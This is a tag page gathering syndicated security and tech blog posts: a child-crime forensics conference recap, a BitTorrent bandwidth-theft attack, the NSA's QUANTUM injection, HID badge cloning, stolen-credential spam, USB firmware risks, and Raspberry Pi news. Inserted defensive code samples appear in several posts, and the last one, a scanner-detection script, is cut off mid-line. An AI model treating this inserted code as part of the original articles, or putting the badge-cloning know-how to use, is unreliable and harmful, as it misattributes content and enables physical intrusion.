Posts tagged ‘research’

The Hacker Factor Blog: CACC Recap

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

I’m finally back from the Crimes Against Children Conference (CACC) and caught up from a week’s worth of out-of-office backlog.

CACC is a really fascinating conference. The topic is serious, sobering, and definitely not “fun” in the traditional sense. It focuses on child abuse, child exploitation, and related issues. Talks ranged from horrific case studies to setting up a sting operation. (I never thought about it, but the officers waiting behind the door are in a very specific order. The suspect really doesn’t stand a chance when the cops burst through the doorway.) The fun part, to me, is how amazing all of the people at the conference are, how informative the sessions were, and how I literally learned something new everywhere I turned, even at the evening dinner social gathering.

One of the best things I attended was the Forensic Challenge. This was the first year that they did it. They turned a hotel room into a crime scene and let teams work the scene. I was given special permission to sit quietly and observe as one group went through the mocked-up suspect’s apartment. This was way better than anything on TV, and I’m still blown away by everything I saw and learned. For example, one guy interviewed the suspect while the other two tossed the place. They systematically searched everything. One guy started off dropping to the floor and looking under the furniture before checking everything. The end result looked like a tornado went through the scene.

Afterwards, I asked if real crime scenes look as ransacked after being searched. “No,” said the veteran officer who ran the challenge. “This team put stuff back.” (The team that I observed didn’t win, but they did better than most teams and they weren’t even LEOs!)

What am I doing here?

Speakers at CACC are by invitation-only. Last year I was invited to give a talk. This year, I was asked to give four hands-on training sessions.

Some of the conference’s training sessions went for a half-day or a full-day, and most went really deep into their topic. I decided to take a different route and ended up giving an overview: “In 90 minutes I will not make you an expert on digital photo analysis. But I will give you an idea about what can be done and give you a little hands-on experience.”

Understanding digital photo analysis is critical for people who investigate child-related abuses. Telling real photos from computer graphics can make the difference between a conviction and a walk. In some cases, being able to quickly pull information out of pictures can mean the difference between life and death. My tools and methods are specifically designed to speed up the analysis process, rapidly extract critical details, and allow the analyst to accurately reach the correct conclusion with a high degree of confidence.

There will be a quiz

Even though I practiced this talk for months, I was still concerned about the timing. I knew that I had way too much material for the scheduled time. Worse: I didn’t get the chance to practice in front of a live audience. The first time I actually gave this presentation to a large group was when I walked into the first training session. Yet, the first class ended at exactly 90 minutes. The second class was a little rushed (lots of people had computer troubles at the beginning and that ate nearly 10 minutes), but it still ended on time. And the last two classes were right on schedule. (Whew!)

I did include one surprise in my presentation, just to check their understanding. At the beginning of each class, I showed them a few pictures and asked if they trusted their eyes. Some pictures were real, some were digitally enhanced, and some were completely computer generated. At the end of the talk, I assigned those same pictures to the class (one picture per row of desks) and gave them exactly three minutes to evaluate their assigned image. (Why three minutes? Many photo analysis tools can take hours for an investigator to evaluate results. With my system, a trained person can evaluate a typical photo in under a minute and achieve a high-confidence result. But these students are not fully trained, so I gave them a few extra minutes. Literally: you have three minutes to evaluate one photo.)

After the allotted time, I asked each table for their results. “Table 1: Is that real, digitally enhanced or computer generated?” Someone would shout back “Fake!” I’d then ask “How do you know?” and they would tell me which analyzers and what they saw. I’d do exactly what they said on the big screen and elaborated on the results.

I had been warned that the first training session of the conference would likely be the most alert since everyone was fully rested. But really, the first class stunned me. As a whole, they nailed the pop quiz. The first class even had multiple people per table describing what they found. Despite the fact that I went very quickly through each section, they still understood it enough to ace the quiz.

The second class was right after lunch, so I expected them to be a little lethargic. They got most of the important observations. The other two classes were on the last day of the conference — after a week of lectures and a big late-night social event. Both classes thought that three minutes was not long enough but still did well. (Not bad for covering six complex topics with about 10 minutes per section, and then giving them only three minutes to apply what they learned.)

Heuristics and Results

The conference ended on Thursday, but I’ve already begun to hear from people who attended my training classes. Each class had between 25 and 35 people, and I’m thrilled that people found value in my training sessions.

For myself, I took away a lot of ideas. With a little research and work, things I learned from talks on psychology and behavioral analysis may be applicable to digital photo forensics. Even little observations made jokingly over dinner may end up forming valuable heuristics or statistical models. I left the conference with three pages of notes about potential research projects. With any luck, a few will even become future blog topics.

TorrentFreak: Attackers Can ‘Steal’ Bandwidth From BitTorrent Seeders, Research Finds

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

BitTorrent is one of the fastest and most efficient ways to share large files over the Internet. The popular file-sharing protocol is used by dozens of millions of people every day and accounts for a substantial amount of total Internet traffic.

This popularity makes BitTorrent an interesting target for attacks, which various anti-piracy companies have shown in the past. One of these possible attacks was recently unveiled by Florian Adamsky, researcher at the City University London.

In an article published in “Computers & Security” Adamsky and his colleagues reveal an exploit which allows attackers to get a higher download rate from seeders than other people.

In technical terms, the exploit misuses BitTorrent’s choking mechanism of clients that use the “Allowed Fast” extension. Attackers can use this to keep a permanent connection with seeders, requesting the same pieces over and over.

The vulnerability was extensively tested in swarms of various sizes, and the researchers found that as few as three malicious peers can already slow download times by up to 414.99%. The larger the number of attackers relative to the number of seeders, the worse the effect becomes.

The impact of the attack further depends on the download clients being used by the seeders in the swarm. The mainline BitTorrent client and uTorrent, for example, are not vulnerable, while Vuze, Transmission and libtorrent-based clients are.

TorrentFreak spoke with Adamsky who predicts that similar results are possible in real swarms. Even very large swarms of more than 1,000 seeders could be affected through a botnet, although it’s hard to predict the precise impact.

“If an attacker uses a botnet to attack the swarm, I think it would be possible to increase the average download time of all peers [of swarms with 1,000 seeders] up to three times,” Adamsky tells us.

“If most of the clients would have a vulnerable client like Vuze or Transmission it would be possible to increase the average download time up to ten times,” he adds.

In their paper the researchers suggest a relatively easy fix to the problem, through an update of the “Allowed Fast” extension. In addition, they also propose a new seeding algorithm that is less prone to these and other bandwidth attacks.
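The passages above describe the attack only at the level of the choking mechanism and the “Allowed Fast” extension, and say the fix is an update to that extension. The following Go program is an added illustration, not code from the paper or from any BitTorrent client: it models a seeder’s request handler with a choked peer that may fetch only its allowed-fast pieces, and shows the difference between serving such a piece every time it is re-requested (the permissive behaviour the attack relies on) and capping how many times a choked peer may pull the same allowed-fast piece. The `RepeatLimit` cap, the type names and the 16 KiB piece size are assumptions made for the example; the real fix proposed in the paper may differ.

```go
package main

import (
	"errors"
	"fmt"
)

// Errors returned when the seeder refuses a request. Constructed for this
// example; not the error values of any real client.
var (
	ErrUnknownPeer = errors.New("unknown peer")
	ErrChoked      = errors.New("peer is choked and piece is not in its allowed-fast set")
	ErrRepeat      = errors.New("allowed-fast piece already served to this choked peer")
)

// Peer is the seeder's bookkeeping for one connected leecher.
type Peer struct {
	ID          string
	Choked      bool
	allowedFast map[int]bool // pieces requestable while choked (BEP 6 "Allowed Fast")
	fastServed  map[int]int  // per-piece count of allowed-fast transfers while choked
	Uploaded    int          // bytes the seeder has sent to this peer
}

// Seeder serves fixed-size pieces. RepeatLimit caps how many times a choked
// peer may re-download the same allowed-fast piece; 0 means no cap, which is
// the permissive behaviour the attack described above relies on.
type Seeder struct {
	PieceSize   int
	RepeatLimit int
	peers       map[string]*Peer
}

func NewSeeder(pieceSize, repeatLimit int) *Seeder {
	return &Seeder{PieceSize: pieceSize, RepeatLimit: repeatLimit, peers: map[string]*Peer{}}
}

// AddPeer registers a leecher, initially choked, with its allowed-fast set.
func (s *Seeder) AddPeer(id string, allowedFast []int) *Peer {
	p := &Peer{ID: id, Choked: true, allowedFast: map[int]bool{}, fastServed: map[int]int{}}
	for _, idx := range allowedFast {
		p.allowedFast[idx] = true
	}
	s.peers[id] = p
	return p
}

// Unchoke grants the peer a normal upload slot: any piece may be requested.
func (s *Seeder) Unchoke(id string) {
	if p, ok := s.peers[id]; ok {
		p.Choked = false
	}
}

// HandleRequest decides whether a request for one piece is served and
// returns the number of bytes sent (PieceSize on success, 0 on refusal).
func (s *Seeder) HandleRequest(id string, piece int) (int, error) {
	p, ok := s.peers[id]
	if !ok {
		return 0, ErrUnknownPeer
	}
	if p.Choked {
		// A choked peer may only pull pieces from its allowed-fast set ...
		if !p.allowedFast[piece] {
			return 0, ErrChoked
		}
		// ... and, once hardened, only a bounded number of times each. A peer
		// that already holds the piece has no legitimate reason to ask again.
		if s.RepeatLimit > 0 && p.fastServed[piece] >= s.RepeatLimit {
			return 0, ErrRepeat
		}
		p.fastServed[piece]++
	}
	p.Uploaded += s.PieceSize
	return s.PieceSize, nil
}

// ReplayAllowedFast models one choked peer asking for the same allowed-fast
// piece `rounds` times and returns how many bytes the seeder gave away.
func ReplayAllowedFast(repeatLimit, rounds int) int {
	s := NewSeeder(16384, repeatLimit) // 16 KiB, a common block size
	s.AddPeer("peer-A", []int{3, 7, 11})
	for i := 0; i < rounds; i++ {
		s.HandleRequest("peer-A", 3) // refusals are the point; the error is ignored here
	}
	return s.peers["peer-A"].Uploaded
}

func main() {
	fmt.Printf("no cap:   %d bytes served for 100 repeat requests\n", ReplayAllowedFast(0, 100))
	fmt.Printf("cap of 1: %d bytes served for 100 repeat requests\n", ReplayAllowedFast(1, 100))
}
```

The uncapped seeder uploads the full 16 KiB one hundred times to a peer it has choked, which is exactly the bandwidth the article says attackers “steal”; with the cap, the seeder still honours the extension for a first transfer but refuses the repeats, so the choked connection no longer yields unbounded upload.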

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Schneier on Security: QUANTUM Technology Sold by Cyberweapons Arms Manufacturers

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Last October, I broke the story about the NSA’s top secret program to inject packets into the Internet backbone: QUANTUM. Specifically, I wrote about how QUANTUMINSERT injects packets into existing Internet connections to redirect a user to an NSA web server codenamed FOXACID to infect the user’s computer. Since then, we’ve learned a lot more about how QUANTUM works, and general details of many other QUANTUM programs.

These techniques make use of the NSA’s privileged position on the Internet backbone. It has TURMOIL computers directly monitoring the Internet infrastructure at providers in the US and around the world, and a system called TURBINE that allows it to perform real-time packet injection into the backbone. Still, there’s nothing about QUANTUM that anyone else with similar access can’t do. There’s a hacker tool called AirPwn that basically performs a QUANTUMINSERT attack on computers on a wireless network.

A new report from Citizen Lab shows that cyberweapons arms manufacturers are selling this type of technology to governments around the world: the US DoD contractor CloudShield Technologies, Italy’s Hacking Team, and Germany’s and the UK’s Gamma International. These programs intercept web connections to sites like Microsoft and Google — YouTube is specially mentioned — and inject malware into users’ computers.

Turkmenistan paid a Swiss company, Dreamlab Technologies — somehow related to the cyberweapons arms manufacturer Gamma International — just under $1M for this capability. Dreamlab also installed the software in Oman. We don’t know what other countries have this capability, but the companies here routinely sell hacking software to totalitarian countries around the world.

There’s some more information in this Washington Post article, and this essay on the Intercept.

In talking about the NSA’s capabilities, I have repeatedly said that today’s secret NSA programs are tomorrow’s PhD dissertations and the next day’s hacker tools. This is exactly what we’re seeing here. By developing these technologies instead of helping defend against them, the NSA — and GCHQ and CESG — are contributing to the ongoing insecurity of the Internet.

Related: here is an open letter from Citizen Lab’s Ron Deibert to Hacking Team about the nature of Citizen Lab’s research and the misleading defense of Hacking Team’s products.

Krebs on Security: How Secure is Your Security Badge?

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Security conferences are a great place to learn about the latest hacking tricks, tools and exploits, but they also remind us of important stuff that was shown to be hackable in previous years yet never really got fixed. Perhaps the best example of this at last week’s annual DefCon security conference in Las Vegas came from hackers who built on research first released in 2010 to show just how trivial it still is to read, modify and clone most HID cards — the rectangular white plastic “smart” cards that organizations worldwide distribute to employees for security badges.

HID iClass proximity card.

Nearly four years ago, researchers at the Chaos Communication Congress (CCC), a security conference in Berlin, released a paper (PDF) demonstrating a serious vulnerability in smart cards made by Austin, Texas-based HID Global, by far the largest manufacturer of these devices. The CCC researchers showed that the card reader device that HID sells to validate the data stored on its then-new line of iClass proximity cards includes the master encryption key needed to read data on those cards.

More importantly, the researchers proved that anyone with physical access to one of these readers could extract the encryption key and use it to read, clone, and modify data stored on any HID cards made to work with those readers.

At the time, HID responded by modifying future models of card readers so that the firmware stored inside them could not be so easily dumped or read (i.e., the company removed the external serial interface on new readers). But according to researchers, HID never changed the master encryption key for its readers, likely because doing so would require customers using the product to modify or replace all of their readers and cards — a costly proposition by any measure given HID’s huge market share.

Unfortunately, this means that anyone with a modicum of hardware hacking skills, an eBay account, and a budget of less than $500 can grab a copy of the master encryption key and create a portable system for reading and cloning HID cards. At least, that was the gist of the DefCon talk given last week by the co-founders of Lares Consulting, a company that gets hired to test clients’ physical and network security.

Lares’ Joshua Perrymon and Eric Smith demonstrated how an HID parking garage reader capable of reading cards up to three feet away was purchased off of eBay and modified to fit inside of a common backpack. Wearing this backpack, an attacker looking to gain access to a building protected by HID’s iClass cards could obtain that access simply by walking up to an employee of the targeted organization and asking for directions, a light for a cigarette, or some other pretext.

Card cloning gear fits in a briefcase. Image: Lares Consulting.

Perrymon and Smith noted that, thanks to software tools available online, it’s easy to take card data gathered by the mobile reader and encode it onto a new card (also broadly available on eBay for a few pennies apiece). Worse yet, the attacker is then also able to gain access to areas of the targeted facility that are off-limits to the legitimate owner of the card that was cloned, because the ones and zeros stored on the card that specify that access level also can be modified.

Smith said he and Perrymon wanted to revive the issue at DefCon to raise awareness about a widespread vulnerability in physical security.  HID did not respond to multiple requests for comment.

“Until recently, no one has really demonstrated properly what the risk is to a business here,” Smith said. “SCADA installations, hospitals, airports…a lot of them use HID cards because HID is the leader in this space, but they’re using compromised technology. Your card might not have data center or HR access but I can get into those places within your organization just by coming up to some employee standing outside the building and bumming a light off of him.”

Organizations that are vulnerable have several options. Probably the cheapest involves the use of some type of sleeve for the smart cards. The wireless communications technology that these cards use to transmit data — called radio-frequency identification or RFID — can be blocked when not in use by storing the key cards inside a special RFID-shielding sleeve or wallet. Of course, organizations can replace their readers with newer (perhaps non-HID?) technology, and/or add biometric components to card readers, but these options could get pricey in a hurry.

A copy of the slides from Perrymon and Smith’s DefCon talk is available here.

Krebs on Security: Q&A on the Reported Theft of 1.2B Email Accounts

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

My phone and email have been flooded with questions and interview requests from various media outlets since security consultancy Hold Security dropped the news that a Russian gang has stolen more than a billion email account credentials. Rather than respond to each of these requests in turn, allow me to add a bit of perspective here in the most direct way possible: The Q&A.

Q: Who the heck is Alex Holden?

A: I’ve known Hold Security’s Founder Alex Holden for nearly seven years. Coincidentally, I initially met him in Las Vegas at the Black Hat security convention (where I am now). Alex is a talented and tireless researcher, as well as a forthright and honest guy. He is originally from Ukraine, and speaks/reads Russian and Ukrainian fluently. His research has been central to several of my big scoops over the past year, including the breach at Adobe that exposed tens of millions of customer records.

Q: Is this for real?

A: Alex isn’t keen on disclosing his methods, but I have seen his research and data firsthand and can say it’s definitely for real. Without spilling his secrets or methods, it is clear that he has a first-hand view on the day-to-day activities of some very active organized cybercrime networks and actors.

Q: Ok, but more than a billion credentials? That seems like a lot.

A: For those unfamiliar with the operations of large-scale organized crime syndicates, yes, it does. Unfortunately, there are more than a few successful cybercrooks who are quite good at what they do, and do it full-time. These actors — mostly spammers and malware purveyors (usually both) — focus on acquiring as many email addresses and account credentials as they can. Their favorite methods of gathering this information include SQL injection (exploiting weaknesses in Web sites that can be used to force the site to cough up user data) and abusing stolen credentials to steal even more credentials from victim organizations.

One micro example of this: Last year, I wrote about a botnet that enslaved thousands of hacked computers which disguised itself as a legitimate add-on for Mozilla Firefox and forced infected PCs to scour Web sites for SQL vulnerabilities.

Q: What would a crime network even do with a billion credentials?

A: Spam, spam and….oh, spam. Junk email is primarily sent in bulk using large botnets — collections of hacked PCs. A core component of the malware that powers these crime machines is the theft of passwords that users store on their computers and the interception of credentials submitted by victims in the process of browsing the Web. It is quite common for major spammers to rely on lists of billions of email addresses for distributing their malware and whatever junk products they are getting paid to promote.

Another major method of spamming (called “Webspam”) involves the use of stolen email account credentials — such as Gmail, Yahoo and Outlook — to send spam from victim accounts, particularly to all of the addresses in the contacts list of the compromised accounts.

Spam is such a core and fundamental component of any large-scale cybercrime operation that I spent the last four years writing an entire book about it, describing how these networks are created, the crooks that run them, and the cybercrime kingpins who make it worth their while. More information about this book and ways to pre-order it before its release in November is available here.

Q: Should I be concerned about this? 

A: That depends. If you are the type of person who re-uses passwords at multiple sites — including email accounts — then the answer is yes. If you re-use your email password at another site and that other site gets hacked, there is an excellent chance that cyber crooks are plundering your inbox and using it to spam your friends and family to spread malware and to perpetuate the cybercrime food chain.

For a primer that attempts to explain the many other reasons that crooks might want to hack your inbox, your inbox’s relative market value, and what you can do to secure it, please see The Value of a Hacked Email Account and Tools for a Safer PC.

Got more questions? Sound off in the comments section and I’ll try to address them when time permits.

Update: As several readers have pointed out, I am listed as a special advisor to Hold Security on the company’s Web site. Mr. Holden asked me to advise him when he was setting up his company, and asked if he could list me on his site. However, I have not and will not receive any compensation in any form for said advice (most of which, for better or worse, so far has been ignored).

Your email account may be worth far more than you imagine.

Raspberry Pi: Mathematica 10 – now available for your Pi!

This post was syndicated from: Raspberry Pi and was written by: Liz Upton. Original post: at Raspberry Pi

Liz: If you use Raspbian, you’ll have noticed that Mathematica and the Wolfram Language come bundled for free with your Raspberry Pi. (A little boast here: we were only the second computer ever on which Mathematica has been included for free use as standard. The first? Steve Jobs’s NeXT, back in 1988.) 

Earlier in July, Wolfram Research announced a big update to Mathematica, with the introduction of Mathematica 10. Here’s a guest post announcement from Arnoud Buzing at Wolfram about what the new Mathematica will offer those of you who use it on your Raspberry Pi. Over to you, Arnoud!

In July, we released Mathematica 10, a major update to Wolfram’s flagship desktop product. It contains over 700 new functions, and improvements to just about every part of the system.

Today I am happy to announce an update for Mathematica and the Wolfram Language for the Raspberry Pi, which brings many of those features to the Raspberry Pi.

To get this new version of the Wolfram Language, simply run this command in a terminal on your Raspberry Pi:

sudo apt-get update && sudo apt-get install wolfram-engine

This new version will also come pre-installed in the next release of NOOBS, the easy set-up system for the Raspberry Pi.

If you have never used the Wolfram Language on the Raspberry Pi, then you should try our new fast introduction for programmers, which is a quick and easy way to learn to program in this language. This introduction covers everything from using the interactive user interface, basic evaluations and expressions, to more advanced topics such as natural language processing and cloud computation. You’ll also find a great introduction to the Wolfram Language in the Raspberry Pi Learning Resources.

This release of the Wolfram Language also includes integration with the newly released Wolfram Cloud. This technology allows you to do sophisticated computations on a remote server, using all of the knowledge from Wolfram|Alpha and the Wolfram Knowledgebase. It lets you define custom computations and deploy them as an “instant API” on the cloud. The Wolfram Cloud is available with a free starter account, and has additional non-free accounts which enable additional functionality.

Check the Wolfram Community in the next couple of weeks for new examples which show you how to use the Wolfram Language with your Raspberry Pi.

Schneier on Security: The Fundamental Insecurity of USB

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

This is pretty impressive:

Most of us learned long ago not to run executable files from sketchy USB sticks. But old-fashioned USB hygiene can’t stop this newer flavor of infection: Even if users are aware of the potential for attacks, ensuring that their USB’s firmware hasn’t been tampered with is nearly impossible. The devices don’t have a restriction known as “code-signing,” a countermeasure that would make sure any new code added to the device has the unforgeable cryptographic signature of its manufacturer. There’s not even any trusted USB firmware to compare the code against.

The element of Nohl and Lell’s research that elevates it above the average theoretical threat is the notion that the infection can travel both from computer to USB and vice versa. Any time a USB stick is plugged into a computer, its firmware could be reprogrammed by malware on that PC, with no easy way for the USB device’s owner to detect it. And likewise, any USB device could silently infect a user’s computer.

These are exactly the sorts of attacks the NSA favors.
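The quoted passage names the missing countermeasure: firmware code-signing, so that a controller accepts only code carrying the manufacturer’s signature. The Go program below is an added example of what that check looks like on the device side; it is not code from Nohl and Lell’s research nor from any USB controller vendor. The update layout (a 4-byte version header followed by the image, with a detached Ed25519 signature over the whole blob) and the type names are assumptions made for the example. It also enforces a version check so that an older, validly signed image cannot be replayed onto the device, a failure mode code-signing alone does not cover.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"encoding/binary"
	"errors"
	"fmt"
)

// Constructed update format for this example (not any vendor's real format):
// 4-byte big-endian version number followed by the raw image, with a detached
// Ed25519 signature over the whole blob.
const versionLen = 4

var (
	ErrMalformed    = errors.New("update rejected: too short to contain a version header")
	ErrBadSignature = errors.New("update rejected: signature does not verify under the manufacturer key")
	ErrRollback     = errors.New("update rejected: version is not newer than the installed one")
)

// Update is what the manufacturer ships.
type Update struct {
	Blob      []byte
	Signature []byte
}

// BuildUpdate is the manufacturer side: prepend the version and sign.
func BuildUpdate(priv ed25519.PrivateKey, version uint32, image []byte) Update {
	blob := make([]byte, versionLen, versionLen+len(image))
	binary.BigEndian.PutUint32(blob, version)
	blob = append(blob, image...)
	return Update{Blob: blob, Signature: ed25519.Sign(priv, blob)}
}

// Device models the controller's persistent state: the manufacturer's public
// key fixed at production time, plus what is currently installed.
type Device struct {
	ManufacturerKey  ed25519.PublicKey
	InstalledVersion uint32
	Image            []byte
}

// Apply is the device side. The signature is checked before anything in the
// blob is interpreted, and a valid-but-older image is refused so a previously
// signed vulnerable version cannot be replayed onto the device.
func (d *Device) Apply(u Update) error {
	if len(u.Blob) < versionLen {
		return ErrMalformed
	}
	if !ed25519.Verify(d.ManufacturerKey, u.Blob, u.Signature) {
		return ErrBadSignature
	}
	version := binary.BigEndian.Uint32(u.Blob[:versionLen])
	if version <= d.InstalledVersion {
		return ErrRollback
	}
	d.InstalledVersion = version
	d.Image = append([]byte(nil), u.Blob[versionLen:]...)
	return nil
}

// Demo walks four deliveries through one device and returns each outcome:
// a genuine v2 update, the same update with one image byte flipped by the
// host after signing, a v3 image signed with a key that is not the
// manufacturer's, and a replay of the genuine v2 once v2 is installed.
func Demo() (genuine, tampered, impostor, replay error) {
	pub, priv, _ := ed25519.GenerateKey(rand.Reader)
	dev := &Device{ManufacturerKey: pub, InstalledVersion: 1}
	image := []byte("constructed firmware image, version 2") // constructed payload

	good := BuildUpdate(priv, 2, image)
	genuine = dev.Apply(good)

	bad := Update{Blob: append([]byte(nil), good.Blob...), Signature: good.Signature}
	bad.Blob[len(bad.Blob)-1] ^= 0xff // host-side tampering after signing
	tampered = dev.Apply(bad)

	_, otherPriv, _ := ed25519.GenerateKey(rand.Reader)
	impostor = dev.Apply(BuildUpdate(otherPriv, 3, image))

	replay = dev.Apply(good)
	return
}

func main() {
	g, t, i, r := Demo()
	fmt.Println("genuine v2:     ", g)
	fmt.Println("tampered image: ", t)
	fmt.Println("impostor key:   ", i)
	fmt.Println("replayed v2:    ", r)
}
```

The point of the ordering in `Apply` is that the device never parses or stores anything from a blob whose signature has not verified, and that the public key is data the host cannot change; without both properties, the host-to-device infection path the passage describes stays open.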

Raspberry Pi: Sonic Pi Competition

This post was syndicated from: Raspberry Pi and was written by: Carrie Anne Philbin. Original post: at Raspberry Pi

Coding music on a Raspberry Pi with Sonic Pi has quickly become a great way to learn programming concepts and to pump out some thumping beats. Last year I worked with Dr Sam Aaron, live coder and academic at the University of Cambridge, to teach KS3 pupils text-based programming on Raspberry Pis as part of their ICT & Computing lessons. Since then Sonic Pi has proved incredibly popular in classrooms worldwide. The scheme of work we used is available for free in the ‘Teach’ section of our resources for any educator wanting to teach computer programming in a fun way.

Since our classroom collaboration, Sam has been busy working on Sonic Pi version 2.0 and together we have been wowing attendees of Picademy with the potential of Sonic Pi for the classroom. We have also been working on Sonic Pi: Live & Coding, a digital research project to turn a Raspberry Pi into a musical instrument with Sonic Pi, working with schools, artists, academics and the Cambridge Junction, which will culminate in a Sonic Pi: Live & Coding Summit this November. In fact, this week at the Cambridge Junction, 60 children have been participating in the project, having coding music battles, and jamming with musicians.

Push Sam’s buttons and watch his eyes pop at Sonic Pi Live and Coding!

To coincide with the summit, we will be launching a Sonic Pi: Live & Coding competition in September to find the best original Sonic Pi composition created by a child or young person in three age categories. We will have a significant number of Raspberry Pis to give away at random for those who take part, and the semi-finalists of the competition will be invited to perform their original work live at the summit in November in front of an audience and panel of judges to potentially be crowned the first ever Sonic Pi Competition winner!

So what are you waiting for? Download Sonic Pi version 2 for your Raspberry Pi by following these instructions, and then take a look at the Sonic Pi 2 article by Sam in the MagPi magazine, and our new Sonic Pi Version 2 Getting Started resource. Take this opportunity to practice and get a head start on the competition!

Get your practice in for the Sonic Pi version 2 competition with our new resource.

TorrentFreak: Google Protects Chilling Effects From Takedown Notices

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

Each week many millions of DMCA-style copyright notices are sent to sites and services around the planet. Initially the process flew almost entirely under the radar, with senders and recipients dealing with complaints privately.

In 2001, that began to change with the advent of Chilling Effects, an archive created by activists who had become concerned that increasing volumes of cease-and-desist letters were having a “chilling effect” on speech.

In the decade-and-a-third that followed the archive grew to unprecedented levels, with giants such as Google and Twitter routinely sending received notices to the site for public retrieval.

However, while Chilling Effects strives to maintain free speech, several times a month rightsholders from around the world (probably unintentionally) try to silence the archive in specific ways by asking Google to de-index pages from the site.

As can be seen from the tables below, Home Box Office has tried to de-index Chilling Effects pages 240 times, with Microsoft and NBC Universal making 99 and 65 attempts respectively.

The ‘problem’ for these copyright holders is two-fold. Firstly, Chilling Effects does indeed list millions of URLs that potentially link to infringing content. That does not sit well with copyright holders.

“Because the site does not redact information about the infringing URLs identified in the notices, it has effectively become the largest repository of URLs hosting infringing content on the internet,” the Copyright Alliance’s Sandra Aistars complained earlier this year.

However, what Aistars omits to mention is that Chilling Effects has a huge team of lawyers under the hood who know only too well that their archive receives protection under the law. Chilling Effects isn’t a pirate index, it’s an educational, informational, research resource.

Thanks to Google, which routinely throws out all attempts at removing Chilling Effects URLs from its indexes, we are able to see copyright holder attempts at de-indexing.

Earlier this month, for example, Wild Side Video and their anti-piracy partners LeakID sent this notice to Google aiming to protect their title “Young Detective Dee.” As shown below, the notice contained several Chilling Effects URLs.

Each URL links to other DMCA notices on Chilling Effects, each sent by rival anti-piracy outfit Remove Your Media on behalf of Well Go USA Entertainment. They also target “Young Detective Dee”. This is an interesting situation that offers the potential for an endless loop, with the anti-piracy companies reporting each others’ “infringing” links on Chilling Effects in fresh notices, each time failing to get them removed.

The seeds of the “endless loop” phenomenon were also experienced by HBO for a while, with the anti-piracy company sending notices (such as this one) targeting dozens of Chilling Effects pages listing notices previously sent by the company.

While publishing notices is entirely legal, the potential for these loops really angers some notice senders.

On April 10 this year a Peter Walley sent a notice to Google complaining that his book was being made available on a “pirate site” without permission. Google removed the link in its indexes but, as is standard practice, linked to the notice on Chilling Effects. This enraged Walley.

None of these rantings had any effect, except to place yet another notice on Chilling Effects highlighting where the infringing material could be found.

It’s a lesson others should learn from too.

SANS Internet Storm Center, InfoCON: green: “Internet scanning project” scans, (Sat, Jul 26th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

A reader, Greg, wrote in with a query on another internet scanning project. He checked out the IP address and it led to a web site, www[.]internetscanningproject.org, which states:

“Hello! You’ve reached the Internet Scanning Project.

We’re computer security researchers performing periodic Internet-wide health assessments.

If you reached this site because of activity you observed on your network:

We apologize for any concern caused by our network activity. We are not specifically targeting your network.

We have not attempted to unlawfully access or abuse your network in any way. We are exclusively accessing publicly available servers, we respect all authentication barriers, and (as you can see) we have made no attempt to hide our activity.

This effort is part of a research project in which we are engaged, with a view to possibly contributing to public Internet health datasets. We believe research of this sort is both legal and beneficial to the security of the Internet as a whole.

However, if you wish to be excluded from our scanning efforts after reading the clarifying information below, please email us with IP addresses or CIDR blocks to be added to our blacklist.”

It does not provide any information or assurances that this is a legitimate research project, and I wouldn’t want to be sending information to unknown people via an unattributable web site. The normal low-level open-source searching doesn’t reveal anything of use or attribution either. It does, however, bring up a fair number of hits from people asking what these scans are and the best way to block them.

It appears this scanning has been running for a couple of weeks and has been using multiple IP addresses (see https://isc.sans.edu/topips.txt for some examples). A curious point, for a “legitimate” scan, is that they have started changing the User-Agent frequently, in some cases to some very odd, nonsensical strings. The core scans are against TCP ports 21, 22 and 443, and the 443 scans may trigger alerts for probing on the Heartbleed bug.
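Detection logic for the behaviour described above, added here as an example and not part of the ISC diary or of the scanning project: the script parses combined-format web-server access lines, profiles each source address by how many distinct User-Agent strings it presented and whether it ever fetched anything beyond "/", and flags sources that rotate through several (often nonsensical) agents. The log lines are constructed for the example, the addresses are RFC 5737 documentation ranges, the thresholds are assumptions to tune against your own traffic, and the emitted iptables rules cover the three ports the diary names.

```python
"""Flag sources that rotate User-Agent strings while probing a web server."""
import re
from collections import defaultdict

# Constructed sample traffic (not real log data): the two scanners use RFC 5737
# documentation addresses and invented agent strings; the third source is an
# ordinary browser session fetching a page and its assets.
SAMPLE_LOG = """\
203.0.113.7 - - [26/Jul/2014:03:14:01 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0 (compatible; scan)"
203.0.113.7 - - [26/Jul/2014:03:14:09 +0000] "GET / HTTP/1.1" 200 612 "-" "qwerty-9981"
203.0.113.7 - - [26/Jul/2014:03:14:17 +0000] "GET / HTTP/1.1" 200 612 "-" "zzz"
203.0.113.7 - - [26/Jul/2014:03:14:25 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/4.0 (blah)"
198.51.100.22 - - [26/Jul/2014:04:00:00 +0000] "GET / HTTP/1.1" 200 612 "-" "curl/7.37.0"
198.51.100.22 - - [26/Jul/2014:04:00:30 +0000] "GET / HTTP/1.1" 200 612 "-" "abc123"
192.0.2.50 - - [26/Jul/2014:05:12:00 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/31.0"
192.0.2.50 - - [26/Jul/2014:05:12:01 +0000] "GET /style.css HTTP/1.1" 200 2048 "http://example.com/" "Mozilla/5.0 (X11; Linux x86_64) Firefox/31.0"
192.0.2.50 - - [26/Jul/2014:05:12:01 +0000] "GET /logo.png HTTP/1.1" 200 9000 "http://example.com/" "Mozilla/5.0 (X11; Linux x86_64) Firefox/31.0"
"""

# Apache/nginx "combined" format:
#   ip ident user [time] "request" status bytes "referer" "user-agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
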